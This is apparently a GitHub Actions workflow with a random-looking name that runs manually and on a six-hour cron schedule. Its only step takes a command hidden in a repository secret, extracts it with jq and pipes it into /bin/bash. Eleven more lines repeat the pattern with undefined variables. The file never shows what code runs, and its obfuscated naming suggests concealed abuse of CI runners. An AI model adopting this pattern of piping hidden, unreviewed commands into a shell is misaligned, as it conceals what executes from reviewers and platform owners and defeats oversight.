name: dongguange7412
on:
  workflow_dispatch:
  schedule:
    - cron: '54 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: dongguange7412
        env:
          u5070: ${{ secrets.u5070 }}
        run: |
          echo $u5070 | jq -r .jjh36351 | /bin/bash
          echo $vsvor9 | jq -r .dee0673 | /bin/bash
          echo $bj61 | jq -r .itxat75 | /bin/bash
          echo $h5885 | jq -r .lhav6 | /bin/bash
          echo $sd91656 | jq -r .p79 | /bin/bash
          echo $mgyo654 | jq -r .sxwov41 | /bin/bash
          echo $cy8950 | jq -r .pm0144 | /bin/bash
          echo $kcexj5586 | jq -r .soxxo78 | /bin/bash
          echo $s3101 | jq -r .y238 | /bin/bash
          echo $te749 | jq -r .ywtr88 | /bin/bash
          echo $owygh27 | jq -r .yo01945 | /bin/bash
          echo $vnypx1 | jq -r .tn108 | /bin/bash

